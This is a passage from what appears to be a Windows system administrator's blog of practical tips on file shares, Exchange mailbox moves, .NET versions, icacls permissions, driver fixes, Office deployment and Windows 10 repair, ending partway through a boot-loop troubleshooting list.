https://www.microsoft.com/en-us/download/details.aspx?id=56121
-Windows 10 (1803)
https://www.microsoft.com/en-us/download/details.aspx?id=56880

Or in any Windows 10 client:
C:\Windows\PolicyDefinitions

Be careful taking the ones installed in a client OS and putting them on a Domain controller that manages multiple OS's. It can be dangerous because they often can have different settings, different ADMX names and can be missing settings for supporting previous versions of the OS.

This video explains it better than I can:

NOTES:

• adm files are older.
• admx files are newer.
• adml files are xml translation/localization files.

## Creating Shares On Server 2012

Many experienced admins get this wrong. Here's how to do it right. There are 5 parts to this.

CREATE THE GROUP

• -login to server.
• -click ACTIVE-DIRECTORY-USERS-AND-COMPUTERS.
• -create a GROUP (aka SECURITY-GROUP).
• -add the users/members.

CREATE THE SHARE

• -create a folder.
• -right-click to PROPERTIES > SHARING.
• -click ADVANCED-SHARING.
• -checkmark SHARE-THIS-FOLDER.
• -if hidden, add a $ at the end.

• -click PERMISSIONS.
• -remove all groups/users.
• -add the GROUP required for this share.
• -checkmark FULL-CONTROL.
• -click OK > OK.

• -click SECURITY tab (at the top).
• -click ADVANCED (at the bottom).
• -click DISABLE INHERITANCE.
• -click CONVERT INHERITED PERMISSIONS INTO EXPLICIT PERMISSIONS.
• -remove all groups/users except SYSTEM.
• -add the GROUP required for this share.
• -checkmark FULL-CONTROL.
• -click OK > APPLY.

TEST PERMISSIONS

• -click the EFFECTIVE ACCESS tab (at the top).
• -test the user/group you want to make sure can access.

NOTES:

• -the EVERYONE group does not include everyone. This is why it should not be used.
• -the most restrictive permissions win.
• -the group is assigned to the user upon login. Consequently, the user will have to logout and login again to test if the share is working.
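
The same procedure scripted in PowerShell, as an added example that is not part of the original post. The group, member, folder and share names are hypothetical, and it assumes an elevated session on the file server with the ActiveDirectory module (RSAT) installed.

```powershell
# Added example: every name below is hypothetical; adjust before use.
Import-Module ActiveDirectory

$GroupName = 'SG-Projects-Share'           # hypothetical security group
$Members   = 'foo.user', 'foo.user2'       # hypothetical members
$Path      = 'D:\Shares\Projects'          # hypothetical folder
$ShareName = 'Projects$'                   # trailing $ hides the share
$Principal = "$env:USERDOMAIN\$GroupName"  # assumes the admin is logged on to that domain

# CREATE THE GROUP
New-ADGroup -Name $GroupName -GroupScope Global -GroupCategory Security
Add-ADGroupMember -Identity $GroupName -Members $Members

# CREATE THE SHARE: the group is the only entry in the share permissions.
New-Item -ItemType Directory -Path $Path -Force | Out-Null
New-SmbShare -Name $ShareName -Path $Path -FullAccess $Principal | Out-Null

# SECURITY TAB: drop inherited entries and leave only SYSTEM (S-1-5-18)
# and the group. (OI)(CI) makes new files and subfolders inherit the entry.
icacls $Path /inheritance:r /grant:r '*S-1-5-18:(OI)(CI)F' "${Principal}:(OI)(CI)F"
if ($LASTEXITCODE -ne 0) { throw "icacls failed with exit code $LASTEXITCODE" }

# TEST PERMISSIONS: show the share ACL, then flag any NTFS entry that is
# inherited or belongs to someone other than SYSTEM or the group.
Get-SmbShareAccess -Name $ShareName |
    Format-Table AccountName, AccessControlType, AccessRight

$allowed = @('S-1-5-18', (Get-ADGroup -Identity $GroupName).SID.Value)
$unexpected = (Get-Acl -Path $Path).Access | Where-Object {
    $sid = $_.IdentityReference.Translate(
        [System.Security.Principal.SecurityIdentifier]).Value
    $_.IsInherited -or ($sid -notin $allowed)
}

if ($unexpected) {
    Write-Warning 'Unexpected NTFS entries on the share folder:'
    $unexpected | Format-Table IdentityReference, FileSystemRights, IsInherited
} else {
    'NTFS ACL holds only SYSTEM and the group, with inheritance disabled.'
}
```

Comparing SIDs rather than account names keeps the check working on non-English servers, where the SYSTEM account has a localized display name.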

## Find the FSMO in Your Domain

You have multiple servers. Despite there being a sync between them, only one can be the master for certain operations. For example, only one server can hold the official invitation list. The other bouncers will have to check the master list. This master is called the FSMO.

So how do you know which server is the FSMO? How do you find the FSMO in your domain?

Here's how:

• open cmd
• type: netdom query fsmo

You can also:

• -open ACTIVE-DIRECTORY-USERS-AND-COMPUTERS.
• -right-click on the domain-name (on the left-hand side).
• -click OPERATIONS MASTER.
• -it should show you there as well. At the different tabs at the top, you can select which OPERATION you are interested in.

There are other ways as well.

## Black Screen of Death on Windows 10 v1607 Update (aka Anniversary Update - a Feature Update)

Black Screen of Death on Windows 10 v1607 Update (aka Anniversary Update - a Feature Update) upon reboot. The only way to get out of it is to power down the computer. Upon reboot, the computer will revert to the previous version of Windows 10 v1511.

So how to get Windows 10 v1607 Update (aka Anniversary Update) to install?

-start the update.
-manually reboot to finish.
-before it reboots, unplug the USB dongle for the Logitech wireless mouse or wireless keyboard.
-the update will install.

## Intel HD Graphics on Windows 10 64-bit

In the spirit of "just show me how to fix it" I will be succinct.

The older Intel HD Graphics 3000 (or Sandy Bridge) is no longer working in WINDOWS-10(v1607). It used to work in WINDOWS-10(v1511) but INTEL is pushing forward. The same is true for Intel HD Graphics 2000 and HD Graphics. This is basically the Intel 6 Generation Chipset.

-Intel refuses to produce drivers for this graphics card on its own but has released a driver and provided it to MS.
-the driver is version 9.17.10.4459.
-the driver has to be gotten from MS and not from INTEL:
http://catalog.update.microsoft.com/v7/site/Search.aspx?q=9.17.10.4459
(it is named: 200028694_9f1eae50bc588760715acd70172f5487dc461e64)

CASE-1
-INTEL GRAPHICS HD 3000
-black screen of death trying to update to WIN-v1607.
-the driver is v9.17.10.4299.
-had to manually untar the cab.
-had to manually update the driver to v9.17.10.4459
-also installed the latest CHIPSET driver for QM67 (intel 6 series).

CASE-2
-INTEL GRAPHICS HD 2000
-black screen of death trying to update to WIN-v1607.
-the driver is v9.17.10.4299.
-had to manually untar the cab.
-had to manually update the driver to v9.17.10.4459
-also installed the latest CHIPSET driver for Q65 (intel 6 series).

CASE-3
-INTEL GMA 4500 (g41 chipset)
-black screen of death trying to update to WIN-v1607.
-the driver is v8.15.10.2702
-make sure KB3176938 is installed.

NOTES:
-use HWINFO to find out details of your computer.
-https://en.wikipedia.org/wiki/List_of_Intel_graphics_processing_units
-https://en.wikipedia.org/wiki/List_of_Intel_chipsets

## Office365 Options

Office365 has many options and it can be confusing on their web site. Here's an easy to read all-in-one page to quickly identify your needs:

| | EXCHANGE-1 | EXCHANGE-2 | OFFICE-365-ESSENTIALS | OFFICE-365-BUSINESS | OFFICE-365-PREMIUM | OFFICE-365-PROPLUS | OFFICE-365-E1 | OFFICE-365-E3 | OFFICE-365-E5 |
|---|---|---|---|---|---|---|---|---|---|
| cost-monthly | $4.00 | $8.00 | $5.00 | $8.25 | $12.50 | $12.00 | $8.00 | $20.00 | $35.00 |
| cost-annual | $48.00 | $96.00 | $60.00 | $99.00 | $150.00 | $144.00 | $96.00 | $240.00 | $420.00 |
| exchange | YES | YES | YES | NO | YES | NO | YES | YES | YES |
| mailbox-size | 50GB | 100GB | 50GB | 0GB | 50GB | 0GB | UNLIMITED | UNLIMITED | UNLIMITED |
| apps-online | NO | NO | YES | YES | YES | YES | YES | YES | YES |
| apps-desktop | NO | NO | NO | YES | YES | YES | NO | YES | YES |
| onedrive | NO | NO | YES | YES | YES | YES | YES | YES | YES |
| onedrive-size | 0TB | 0TB | 1TB | 1TB | 1TB | 1TB | 1TB | 1TB | 1TB |
| shared contacts | YES | YES | YES | NO | YES | NO | YES | YES | YES |
| shared calendar | YES | YES | YES | NO | YES | NO | YES | YES | YES |
| maximum users | UNLIMITED | UNLIMITED | 300 | 300 | 300 | UNLIMITED | UNLIMITED | UNLIMITED | UNLIMITED |

NOTES:

## Exchange 2013 Change Primary SMTP Email Address

Exchange 2013 Change Primary SMTP Email Address

You might get the following, "Couldn't update the primary SMTP address because this mailbox is configured to use an e-mail address policy."

Here's how to fix:
Set-Mailbox foo.user -PrimarySmtpAddress <new-primary-smtp-address> -EmailAddressPolicyEnabled $false

Or if you need to set all the addresses for one mailbox all at once (the capital SMTP is the primary smtp address and the lowercase smtp is the additional smtp email addresses):

Set-Mailbox foo.user -EmailAddresses smtp:foo.user@domain1, smtp:foo.user@domain2, SMTP:foo.user@domain3 -EmailAddressPolicyEnabled $false

## Grab All The Photos From A Web Site

So you want to grab all the photos from a web site do you? Here's how:

wget -nd -r -A jpg -e robots=off http://wherever.tld

This will put all the photos from the web site you reference (and all lower directories) to a single directory. This will not magically grab photos from a directory which has no page attached to it and has random names.

If you do know the names are sequential numbers then you can try:

wget -nd -r -A jpg -e robots=off http://wherever.tld/gallery/{0..1000}.jpg

## Create a ZIP File in Linux

Create a ZIP file in Linux.

This will create a ZIP file called foo.zip that contains all of the documents in the current directory.

zip foo.zip ./*

## Exchange 2013 Move Mailbox From One Database to Another Database

Here's the command to move a mailbox from one database to another database:

New-MoveRequest foo.user -TargetDatabase "Mailbox XYZ"

Here's how to do a batch based on last name letter:

Get-mailbox -Database "Mailbox-Foo1" -ResultSize Unlimited |get-recipient -RecipientType UserMailbox -Filter {lastname -like 'h*'} |get-mailbox |New-MoveRequest -TargetDatabase "Mailbox-Foo2" -BatchName "Foo-batch"

Here is the diagnostic short list:

get-moverequest
get-moverequeststatistics
remove-moverequest foo.user
(get-moverequest).count

### SPEED TWEAKS ON HOW TO MOVE MAILBOXES FASTER

I have found that moves are slow unless they are set as EMERGENCY. Here's how:

set-MoveRequest foo.user -priority emergency

Also, some have found that turning off the MRS (throttling) improves performance. I haven't tried it. Here's how:

reg query "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS

:: TURN OFF MRS (the value is a DWORD; without /t, reg add would write a string)
echo y | reg add   "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS /t REG_DWORD /d 0
:: STOP EXCHANGE REPLICATION SERVICE
sc stop MSExchangeRepl

:: TURN ON MRS
echo y | reg add   "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS /t REG_DWORD /d 1
:: START EXCHANGE REPLICATION SERVICE
sc start MSExchangeRepl

### SEE WHAT'S HAPPENING

Here's how to see the full list:

Get-moverequest |get-moverequeststatistics |sort-object -Property PercentComplete -descending

Here's how to see how many have finished:

(Get-MoveRequest -movestatus completed).count

Here's how to see how many are in progress:

(Get-MoveRequest -movestatus inprogress).count

Here's how to see how the normal-moves are going:

Get-moverequest -movestatus inprogress |get-moverequeststatistics |sort-object -Property PercentComplete -descending

Here's how to see how the emergency-moves are going:

Get-moverequest -movestatus inprogress -flags highpriority |get-moverequeststatistics |sort-object -Property PercentComplete -descending

### WHAT TO DO WITH "FAILED" MOVES

If move requests fail, you can see why. Here's how:

get-moverequeststatistics -includereport foo.user |fl

Usually a single bad item. You can set the move to raise the badlimit just a little and restart the move with the following:

get-moverequest foo.user |set-moverequest -baditemlimit 10 -priority emergency
resume-moverequest foo.user

## EXCHANGE 2013 Mailflow Stop After Update is Cancelled

Cancel EXCHANGE update (CU13) because it requires a HOTFIX (or two) before it continues. Afterwards, OUTLOOKs are disconnected; OUTLOOK-WEB-ACCESS works; sending & receiving email doesn't work. Hmmmm.... what to do.

Checking the WINDOWS logs and I see:

"Failed to discover Ews Url for mailbox"

Then I check for the EXCHANGE COMPONENT STATUS:

• Get-ServerComponentState -Identity ServerNameHere

This will tell you the state of the server components in an ACTIVE/INACTIVE way. If something is INACTIVE, you can turn it to ACTIVE by:

• Set-ServerComponentState -Identity ServerNameHere -Component ServerWideOffline -State Active -Requester Functional
• sc stop MSExchangeTransport
• sc stop MSExchangeFrontEndTransport
• timeout 80
• sc start MSExchangeTransport
• sc start MSExchangeFrontEndTransport

It should turn back to ACTIVE. However, if there was a second REQUESTER making the change to INACTIVE, this REQUESTER must also be set to ACTIVE for the whole status to be ACTIVE:

• Set-ServerComponentState -Identity ServerNameHere -Component ServerWideOffline -State Active -Requester Maintenance
• sc stop MSExchangeTransport
• sc stop MSExchangeFrontEndTransport
• timeout 80
• sc start MSExchangeTransport
• sc start MSExchangeFrontEndTransport

Another way to fix this is to install the HOTFIXES that are needed and then proceed with the EXCHANGE update. Wait about an hour or so and voilà! Working server automatically. Apparently, the EXCHANGE update automatically turns off some of the components. If the update is canceled, these components are left in the INACTIVE state. Going through the update process turns the components to the ACTIVE state automatically.

NOTES:
-https://blogs.technet.microsoft.com/exchange/2013/09/26/server-component-states-in-exchange-2013/
-google: "Failed to discover Ews Url for mailbox"
-to test mail flow use: Test-Mailflow -TargetEmailAddress test@example.com

## How to Enable DOTNET 3.5 on Windows 10

### BACKGROUND

DOTNET is a computer language. If it is installed on you, you can speak it and understand it.

DOTNET is to MICROSOFT what JAVA is to SUN/ORACLE.

There are certain versions of DOTNET that automatically come with certain versions of WINDOWS. They are as follows:

| DOTNET VERSION | DATE | WINDOWS VERSION |
|---|---|---|
| 1.0.0 | 02/13/02 | XP |
| 1.1.0 | 04/24/03 | N/A |
| 2.0.0 | 11/07/05 | N/A |
| 3.0.0 | 11/06/06 | Vista |
| 3.5.0 | 11/19/07 | 7 |
| 4.0.0 | 04/12/10 | N/A |
| 4.5.0 (378389) | 08/15/12 | 8 |
| 4.5.1 (378675/378758) | 10/17/13 | 8.1 |
| 4.5.2 (379893) | 05/05/14 | N/A |
| 4.6.0 (393295) | 07/20/15 | 10 |
| 4.6.1 (394254) | 11/30/15 | 10 v1511 (November Update) |
| 4.6.2 (394802) | 08/02/16 | 10 v1607 (Anniversary Update) |
| 4.7.0 (460798) | 04/11/17 | 10 v1703 (Creators Update) |
| 4.7.1 (461308) | 10/17/17 | 10 v1709 (Fall Creators Update) |
| 4.7.2 (461808) | 04/10/18 | 10 v1803 (April 2018 Update) |

DOTNET can be installed in parallel with other versions. For example, v3.5 can be installed with v4.0.

Certain versions of DOTNET are required for certain software to run. If something is built to run off of v3.5, this doesn't mean it will work with v4.6.2.

Starting with WINDOWS 10, DOTNET v4.6.0 is included.

DOTNET v3.5 (including v2 & v1) is included in WINDOWS 10 as a "feature" but it is not installed/enabled.

### TO SEE IF DOTNET 3.5 (v2 & v1) IS INSTALLED ON WINDOWS 10

• -click START > RUN
• -type: cmd
• -type: DISM /Online /get-features /Format:Table

This will list out all the features of WINDOWS 10 and their status.

You are looking for NETFX3. This is DOTNET v3.5 (v2 & v1).

### ENABLE DOTNET v3.5 (v2 & v1)

If it is not enabled, you will need to enable it.

• -click START > RUN
• -type: cmd
• -type: DISM /Online /Enable-Feature /FeatureName:NetFx3 /All

Or for an OFFLINE installation where you have the source CD/DVD/USB/WIM/SHARE:

• DISM /Online /Enable-Feature /FeatureName:NetFx3 /All /LimitAccess /Source:c:\path\to\Windows10x64\sources\sxs
• DISM /Online /Enable-Feature /FeatureName:NetFx3 /All /LimitAccess /Source:\\server\share\os\Win10x64\untar\sources\sxs

### FIND DOTNET VERSION

To find the DOTNET version:

• -type: Get-ChildItem "hklm:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\"
or
• -type: reg query "hklm\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v Release
This will give the value in HEX. You have to convert the HEX number to DEC.

This will give a RELEASE value that corresponds to a VERSION number. See the chart above.

## WINDOWS PERMISSIONS WITH ICACLS

WINDOWS permissions with icacls.

When permissions in WINDOWS are FUBAR'd, start from scratch by resetting the permissions as they would be if nothing has changed.

RESET PERMS FOR DIR RECURSIVELY
icacls folder-name-here /t /reset

Now, from this point if you would like to add a USERNAME or GROUPNAME:

ADD FULL PERMS FOR DIR RECURSIVELY
(doesn't change existing)

If you want to set permissions explicitly as you tell it to:

REMOVE INHERITANCE | GRANT USERNAME | (CI) ENSURES NEW ITEMS WILL HAVE THESE PERMS
(changes everything from scratch)
icacls foo-folder /inheritance:r /grant username:(ci)f /t

EXAMPLE
(This is probably what you want. The SYSTEM, OWNER, ADMINISTRATORS all have FULL CONTROL. The USERNAME has READ-ONLY-CONTROL).

BONUS:
If you need to take ownership beforehand, you can do so by the following:
takeown /f top-folder-name /r /d y

or:
takeown /f "c:\foo folder" /r /d y
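
A reset wipes whatever explicit entries were on the tree, so it is worth saving the ACLs first. The sequence below is an added example, not the author's own commands: it backs up the ACLs, resets them, then applies one way to get the layout the EXAMPLE above describes (SYSTEM and ADMINISTRATORS with full control, one user read-only). The folder, user and backup file names are hypothetical.

```powershell
# Added example: hypothetical folder, user and backup file. Run elevated.
$Target  = 'D:\Data\foo-folder'
$User    = "$env:USERDOMAIN\foo.user"
$AclFile = Join-Path $env:TEMP 'foo-folder-acl-backup.txt'
$Parent  = Split-Path -Parent $Target

function Assert-IcaclsOk([string]$Step) {
    # icacls returns a non-zero exit code when any file failed.
    if ($LASTEXITCODE -ne 0) { throw "$Step failed with exit code $LASTEXITCODE" }
}

# 1. Save the current ACLs of the folder and everything below it.
icacls $Target /save $AclFile /t /c
Assert-IcaclsOk 'save'

# 2. Reset the tree so every item only inherits from its parent.
icacls $Target /reset /t /c
Assert-IcaclsOk 'reset'

# 3. Break inheritance on the top folder only and grant explicitly:
#    S-1-5-18 = SYSTEM, S-1-5-32-544 = BUILTIN\Administrators (full control),
#    the user gets read and execute. (OI)(CI) passes the entries down, so
#    the children pick them up through inheritance and /t is not needed.
icacls $Target /inheritance:r /grant:r `
    '*S-1-5-18:(OI)(CI)F' '*S-1-5-32-544:(OI)(CI)F' "${User}:(OI)(CI)RX"
Assert-IcaclsOk 'grant'

# 4. Show the result and check the tree for non-canonical ACLs.
icacls $Target
icacls $Target /verify /t /c
Assert-IcaclsOk 'verify'

# Rollback: the saved file stores paths relative to the parent folder,
# so restore against $Parent, not $Target.
# icacls $Parent /restore $AclFile /c
```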

## How To Find .Net Version Installed | How To Find the Powershell Version Installed

Find .Net Version installed on your computer or to find the Powershell version installed on your computer:

• -open POWERSHELL
• -type: $PSVersionTable

The CLRVersion is the .NET version in "version name." If you want to know what it is in "product name" type it into google.

The PSVersion is the Powershell version installed.

## How to Checksum Files in Windows 10

How to Checksum Files in Windows 10.

There are a few ways to CheckSum files in Windows 10 listed in the great wide open of the internet. They are as follows:

fciv (outdated from 2004)
fciv -md5 d:\programs\setup.exe

certutil (built into Windows)
CertUtil -hashfile C:\TEMP\MyDataFile.img MD5

get-filehash (built into PowerShell v4 and higher)
get-filehash -algorithm md5 <file_to_check>

other tools
There are other tools out there but I prefer to stick with what's built into the OS and released/blessed from the OS author.

## Access RAPIDSSL Certificates

To access your RAPIDSSL certificates or your GEOTRUST certificates, you can login to their END USER PORTAL here:

This is kinda hidden since typically RAPIDSSL only sells to resellers and pushes all support through them, so I'm making a note of it.

## SQL Server 2014 High CPU After Installing SP2

SQL Server 2014 High CPU After Installing SP2.

There are 3 steps I used to fix this:

STEP 1: find the username of the SQL

• -open "SQL Server 2014 Configuration Manager."
• -right-click on the instance of SQL that you are running.
• -click PROPERTIES (a box opens).
• -click LOG-ON tab (at the top).
• -take note of the USERNAME that is running.
• -click OK
• -exit out of "SQL Server 2014 Configuration Manager."

STEP 2: add the username to the LOCK PAGES IN MEMORY section

• -click START > RUN
• -type: gpedit.msc
• -click COMPUTER-CONFIGURATION > WINDOWS-SETTINGS > SECURITY-SETTINGS > LOCAL-POLICIES > USER-RIGHTS-ASSIGNMENT
• -find LOCK-PAGES-IN-MEMORY
• -click ADD-USER-OR-GROUP
• -type in the USERNAME from above.

STEP 3: adjust the MAX MEMORY

• -open the 2014 MANAGEMENT STUDIO
• -login to the SQL DATABASE you are running.
• -right-click the SQL DATABASE name (at the top, on the left-hand side)
• -click PROPERTIES
• -click MEMORY (on the left hand side).
• -you will see the MINIMUM SERVER MEMORY and the MAXIMUM SERVER MEMORY areas.
• -leave the MINIMUM SERVER MEMORY at 0 (zero).
• -find the MAXIMUM SERVER MEMORY box.
• -type in the number for your server. This number is based on the amount of RAM in your system.
• -the chart is here: https://www.brentozar.com/blitz/max-memory/
• -click OK.

That's it!!! You did it!!!

## Windows 10 Product Key

slmgr /ipk xxxxx-xxxxx-xxxxx-xxxxx-xxxxx

Of course, replace your product key here.

This didn't work for me for some reason. I had to go traditional gui route and that worked. Same product key.

## WOL Control

Waking remote computers with WOL. As usual, the options are dizzying. Here's a cheat sheet.

See what's capable:

powercfg -devicequery wake_from_any

But this list is too long. Since not all devices can be config'd, some devices are going to wake whether the user wants them to or not.
So to see what's capable of being user config'd (what can be changed):

powercfg -devicequery wake_programmable

See what's enabled:

powercfg -devicequery wake_armed

And finally, to enable a device to be a waking point:

POWERCFG -deviceenablewake "exact device name here"

A quick batch script would be:

POWERCFG -devicequery wake_from_any | FINDSTR /i "net" > c:\foo\adapters.txt
FOR /F "tokens=*" %%i IN (c:\foo\adapters.txt) DO POWERCFG -deviceenablewake "%%i"

## Manage Printers via Command Line

Manage printers via command line:

• Get the default printer details from command line:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs -g

• Get the list of printers added to the system from Windows command line:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs -l

• Set default printer from windows command line:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs -t -p "\\Servername\printername"

## Install Windows 10 In-Place Upgrade on All Computers in a Domain With PDQ Deploy

Install Windows 10 In-place upgrade on a domain is possible in a couple of ways. The official way is to use the MICROSOFT DEPLOYMENT TOOLKIT found here: https://technet.microsoft.com/en-us/windows/dn475741.aspx

The other way is through simple network share. Wait... what? Yes, network share.

STEP 1: get WINDOWS 10 ISO at https://www.microsoft.com/en-us/software-download/windows10ISO

• -you will see 4 options
  WINDOWS 10 (all languages)
  WINDOWS 10 K (Korean law)
  WINDOWS 10 N (European law)
  WINDOWS 10 SINGLE LANGUAGE (1 language only)
• -simply download the one you need. The one that matches what you have now which is probably WINDOWS 10 ALL LANGUAGES.
• -again, since you are doing an IN-PLACE UPGRADE, the ISO must match what's on your system now. Many of the issues people are having are that they are trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE when they have WINDOWS 7 ALL LANGUAGES installed on their machine.
• NOTE: do NOT use the MEDIA-CREATION-TOOL for this exercise.

STEP 2: mount WINDOWS 10 ISO

This means show the files that are in the ISO. Windows 7 cannot do this without some help such as WINRAR, 7ZIP or VIRTUAL-CLONEDRIVE. WINDOWS SERVER 2012, WINDOWS 8.1 and newer can do this without additional software. This can happen either through the GUI or through POWERSHELL command MOUNT-DISKIMAGE. There is no correct way on how you mount the ISO, just do it.

STEP 3: create the network share

Create the share:

• md C:\installs\os\win10x64\unpack

And share it so everyone can read it (outside the scope of this article post).

STEP 4: copy the ISO contents onto a created network share.

I use ROBOCOPY to do this. It is built into WINDOWS 7 and newer. Something like:

• robocopy /e f:\ C:\installs\os\win10x64\unpack

STEP 5: Build your install package

Pretty easy when you know how to do it right.

• -select the setup.exe on the network share. Something like: \\myserver\installs\os\win10x64\unpack\setup.exe
• -type in the parameters: /auto upgrade /Compat IgnoreWarning /installfrom c:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\sources\install.wim /dynamicupdate disable /showoobe none /quiet
  NOTE: if you would like, you can save the log files as well. Add the following to the end of the parameters above: /copylogs \\myserver\installs\os\win10x64\logs
• -checkmark "Include Entire Directory"
• click PACKAGE PROPERTIES
• make sure the COPY MODE is changed to PULL (not PUSH).
• checkmark "use custom timeout" and change the number to 240.
• save the package.

STEP 6: deploy on test victim.

That should do it!!! If the test pc works, deploy to the rest of the pc's how you see fit.

==============================================================

If for some reason the above PDQ package fails, you can create a .bat file and fill it with following (adjust as necessary):

:: MAKE DIRECTORY.
md c:\installs\Windows10x64
:: COPY FILES.
robocopy /MIR \\myserver\installs\os\win10x64\unpack\ c:\installs\Windows10x64
:: CHANGE DIRECTORY.
cd c:\installs\Windows10x64
:: START THE IN-PLACE UPGRADE (OR CLEAN INSTALL).
start /wait setup.exe /auto upgrade /Compat IgnoreWarning /installfrom c:\installs\Windows10x64\sources\install.wim /dynamicupdate disable /showoobe none /quiet

• Save this .bat in \\myserver\installs\os\win10x64\unpack\
• Then create a PDQ package with this bat.
• Deploy as you see fit.

## Office 2010 "You don't have permission to open this file."

You also might get, "filename.xls could not be found."

-disable Panda's DATA SHIELD.

Panda's Cloud free antivirus has a new component called Data Shield. Disable the DATA SHIELD and it will fix the issue.

## Automatically Install Office 2016 to Domain Network

• -download ISO.
• -mount ISO.
• -copy contents to network share.
• -run setup.exe /admin
• -config (product key, org name, etc).
• -click FILE SAVE.
• -save the MSP file at the network share.
• -follow the rest.

This will automatically deploy OFFICE 2016 to domain PC's of your choosing. And it's completely silent.

This process is how network administration should be done! Not "proof of concept" stuff along with long winded instruction sets.

## HDMI Cable Speeds

2160/60p, 4:2:0, 8-bit, 8.91Gbps
2160/60p, 4:2:0, 10-bit, 11.14Gbps
2160/60p, 4:2:0, 12-bit, 13.37Gbps
2160/60p, 4:2:0, 16-bit, 17.82Gbps
2160/60p, 4:2:2, 8-, 10- or 12-bit, 17.82Gbps
2160/60p, 4:4:4, 8-bit, 17.82Gbps
4320/60p, 4:4:4, 12-bit, ~72Gbps

HDMI CERTIFICATE TYPES

Standard (or "category 1"), no Ethernet;
High Speed (or "category 2"), no Ethernet;
Standard, with Ethernet;
High Speed, with Ethernet;
Premium, no Ethernet;
Premium, with Ethernet.

Full Disclosure: I have an AudioQuest cable.
Picked it up at a conference as a freebie ;-)

## ErrorCode: 1603(0x643) | Office 2010 Won't Install on Windows 10 | CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057

WINDOWS 10 is having trouble installing software. This is a complex issue but basically some software won't install (or updates won't install) because of an ERROR 1603. More specifically: ErrorCode: 1603(0x643).

Turning on VERBOSE logging (check another article but it puts the logs in %user%\appdata\local\temp) for the install, it shows that the actual error is: CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057.

Hmmm... What to do?

• -click START > RUN > REGEDIT
• -navigate to: hkey_local_machine/software/microsoft/windows nt/currentversion/profilelist

Nested underneath, you will see SID's. Something like:

• s-1-5-18
• s-1-5-19
• s-1-5-20
• s-1-5-21-...1000
• s-1-5-21-...1003
• s-1-5-82

To see which SID's correspond to actual accounts:

• -type: wmic useraccount get name,sid

You'll see something like:

• 1000 owner
• 1003 tempfix

Notice that s-1-5-18, s-1-5-19, s-1-5-20 do not show. So what's up? Well, this is because these are system-accounts that are not used/seen. This is what we are concerned about. They are as follows:

• s-1-5-18 is SYSTEM
• s-1-5-19 is LOCAL SERVICE
• s-1-5-20 is NETWORK SERVICE

Next, go back to regedit to: hkey_users

A DEFAULT NORMAL INSTALL has something like:

• S-1-5-18
• s-1-5-19
• s-1-5-20
• s-1-5-21-...1215
• s-1-5-21-...1216
• s-1-5-21-...1217

What we are seeing is that some of the upgrades to WINDOWS 10 are BROKEN and have the following:

• s-1-5-18
• s-1-5-19
• s-1-5-21-...1000
• s-1-5-21-...1003

So, it is missing s-1-5-20.

Here's how to fix:

• -start > all-programs > accessories
• -right click COMMAND-PROMPT > run-as-administrator
• -type ren C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT *.OLD
• -xcopy /h "C:\Users\Default\NTUSER.DAT" "C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT"
• -in explorer travel to C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
• -right-click > properties > security > edit > add
• -type: NETWORK SERVICE
• -give NETWORK SERVICE full-control
• -reboot

Now, upon reboot, open REGEDIT again and go to HKEY_USERS. You should now see that s-1-5-20 is added back in. Let's add the correct permissions:

• -right-click on S-1-5-20
• -click permissions > add
• -type: network service
• -click OK
• -checkmark FULL CONTROL
• -click OK

I do not have a good explanation of why this happens. It could be a corrupt file. It could be a failed upgrade. It could be some type of antivirus. I do not know. What I know is that this took a few days to figure out and the software will now install successfully!!!!

## Download Office 2010

Download Office 2010.

Let's say that you have an OFFICE 2010 install that doesn't work. You cannot uninstall it either. Nor do you have a CD/USB/SOURCE to install because it was on your computer when you bought it and you just used a PRODUCT KEY. What do you do?

NOTE: !!!Make sure you have your PRODUCT KEY!!! You can get this with BELARC-ADVISOR (among many others).

1 - UNINSTALL OFFICE

You can uninstall office by using the automatic uninstall tool here:
2013 | 2016 http://support.microsoft.com/kb/2739501

2 - DOWNLOAD OFFICE

Yes, you need a PRODUCT KEY/INSTALL KEY. So if you were looking to download for free, this isn't that kind of place.
You can download office here: https://www.microsoft.com/en-us/software-download/office

3 - EXTRACT OFFICE

• -run COMMAND PROMPT (as administrator)
• -office_hs_2010_english_x32.exe /extract:c:\office2010

4 - INSTALL OFFICE

• -right-click on setup.exe
• -run as administrator

## [Solved] Your PC Ran Into A Problem And Needs To Restart Windows 10 Loop

"Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop!

or

"Your PC did not start correctly"

Collectively, let's all say "Arrrrrrrrrrrrrrrrgh!!!"

This is the stuff that I really dread for the average person. How in the world is a normal person supposed to be able to get through an issue like this?

There are 10 possible reasons for this loop and possibly more that need repairing:

• 1-startup repair
• 2-checkdisk
• 3-system restore
• 4-safe boot / low res
• 5-sfc
• 6-windowsapps folder
• 7-registry repair
• 8-boot repair
• 9-dism
• 10-reload and transfer

ISSUE 1 - There is a startup problem (startup repair).

• -click ADVANCED OPTIONS.
• -click TROUBLESHOOT.
• -click ADVANCED OPTIONS.
• -click STARTUP REPAIR.
• -let it go through its process and restart.

ISSUE 2 - There is a filesystem problem (checkdisk).

• -click ADVANCED OPTIONS.
• -click TROUBLESHOOT.
• -click ADVANCED OPTIONS.
• -click COMMAND PROMPT
• -type: chkdsk d: /f /r
• (note depending on what your OS drive letter is, this could be: chkdsk c: /f /r)
• -let it go through its process and restart.

ISSUE 3 - System Restore

• -click ADVANCED OPTIONS.
• -click TROUBLESHOOT.
• -click ADVANCED OPTIONS.
• -click SYSTEM RESTORE.
• this will go through a process of showing previous time in the past. You can choose one of these points. Your system-files will go back to that time, removing any updates, patches or changes. Your document-files will remain as they are now.
• -let it go through its process and restart.

ISSUE 4 - safe-mode or low-resolution-video

• -click ADVANCED OPTIONS.
